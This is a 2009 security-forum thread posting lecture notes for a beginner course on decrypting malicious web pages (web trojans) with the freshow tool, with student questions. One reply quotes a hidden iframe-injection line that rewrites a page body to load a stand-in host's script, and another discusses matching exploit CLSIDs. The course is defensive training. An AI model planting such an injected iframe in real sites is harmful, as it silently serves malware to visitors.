瑞星卡卡安全论坛

首页 » 综合娱乐区 » 活动专区 » 实习生专区 » 实习生交流区 » 2009年7月21日[网马解密]讲义
networkedition - 2009-7-21 10:07:00
讲义打包下载在7楼




 附件: 您所在的用户组无法下载或查看附件

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
networkedition - 2009-7-21 10:08:00

 附件: 您所在的用户组无法下载或查看附件
networkedition - 2009-7-21 10:08:00

 附件: 您所在的用户组无法下载或查看附件
networkedition - 2009-7-21 10:08:00

 附件: 您所在的用户组无法下载或查看附件
networkedition - 2009-7-21 10:08:00

 附件: 您所在的用户组无法下载或查看附件
networkedition - 2009-7-21 10:09:00

 附件: 您所在的用户组无法下载或查看附件
networkedition - 2009-7-21 10:13:00
本次网马解密培训着重已freshow工具为主。附件为讲义下载。

附件: 讲义.rar
aaccbbdd - 2009-7-21 10:15:00
师父:kaka14:
才讲这么点?
最硬的石头 - 2009-7-21 10:17:00
跟着膜拜,学习网马:kaka9:
零度的穷浪漫 - 2009-7-21 10:18:00
坐前排:kaka12:
幽灵楠 - 2009-7-21 10:20:00
如果我系统补丁 第三方软件漏洞已经全部打齐了 是不是不会中网马了?黑客自己发现的漏洞除外。
爱上夏天的冰 - 2009-7-21 10:28:00
就这么点?
zapline - 2009-7-21 10:48:00
:kaka12: 再讲讲对URL的加密啊
最硬的石头 - 2009-7-21 11:00:00


引用:
原帖由 幽灵楠 于 2009-7-21 10:20:00 发表
如果我系统补丁 第三方软件漏洞已经全部打齐了 是不是不会中网马了?黑客自己发现的漏洞除外。


理论不会,但是现在时满天飞的0day:kaka12:
迷失の坏坏 - 2009-7-21 11:02:00
排排坐。分果果。(*^__^*)...嘻嘻。。来上课咯:kaka12:
基牛 - 2009-7-21 11:36:00
自带小板凳。 坐着听~~:kaka1:
零度的穷浪漫 - 2009-7-21 11:43:00
这些工具都怎么用啊?哪个是比较适合我这种菜鸟的?看了半天还是很迷茫啊,望老师讲解:kaka2:
54wy - 2009-7-21 13:23:00
对这方面了解不多,悉心学习。
不才补充一下malzilla的下载地址:http://www.uushare.com/user/roxiel/file/1454388
其中还可以看到Freshow的初级教程。
still刀刀 - 2009-7-21 13:44:00
尽管系统漏洞打上补丁,点击挂马网站自身电脑还是会中毒吧!有时软件也会有漏洞会被黑客利用,用一些安全浏览器具有识别功能的好一点。
朋♂友 - 2009-7-21 14:28:00
学习
skaka7941455 - 2009-7-21 14:56:00
.js是什么文件  是不是所有的。js都是网马呢?
安旗中国 - 2009-7-21 15:02:00
如果没有漏洞也禁用了js java等就不会中网页木马了吗?

这些软件除了能得到网页源码还能干什么?

用freshow连卡卡论坛怎么好多乱码?

云里雾里的,该好好学html语言了
迷失の坏坏 - 2009-7-21 16:36:00
老师能不能多讲点呢?:kaka2: 我们现在用什么工具练练手好呢?
大班老板 - 2009-7-21 17:06:00
没讲加密解密。。。吗
pcshare - 2009-7-21 18:42:00
有作业吗?:kaka5:
Ass_Frog - 2009-7-21 19:08:00
关于6.隐蔽挂马:(top.document.body.innerHTML = top.document.body.innerHTML+'\r\n<iframe  src="http://www.xxx.com/XX.htm/" \>' ) 后面的"[ /url]"标签,是多打上去的?还是top这段代码就是利用url的方式来实现挂马的?

example:
[url=http://bbs.ikaka.com/top.document.body.innerHTML=top.document.body.innerHTML+'\r\n<iframe  src="http://www.163.com/" \>']163[/url]
a123b_lin - 2009-7-21 19:49:00
根据CLSID判断漏洞
麻烦请解释一下一串字符中每部分代表什么意思,又是如何知道它所代表的漏洞名称
gvista - 2009-7-21 20:03:00
这堂课貌似内容不多啊,如果能讲一些更具体的就好了。
networkedition - 2009-7-21 20:08:00
适合菜鸟用的就是freshow这个工具,第二次课会着重对此工具进行讲解
networkedition - 2009-7-21 20:12:00
在一般网马解密过程中,获取到加密源文件中,包含有利用漏洞的clisd值,可根据相应的值通过此表(收录clisd值不全),对比来查询。也可借助搜索引擎来进行查询。
12
查看完整版本: 2009年7月21日[网马解密]讲义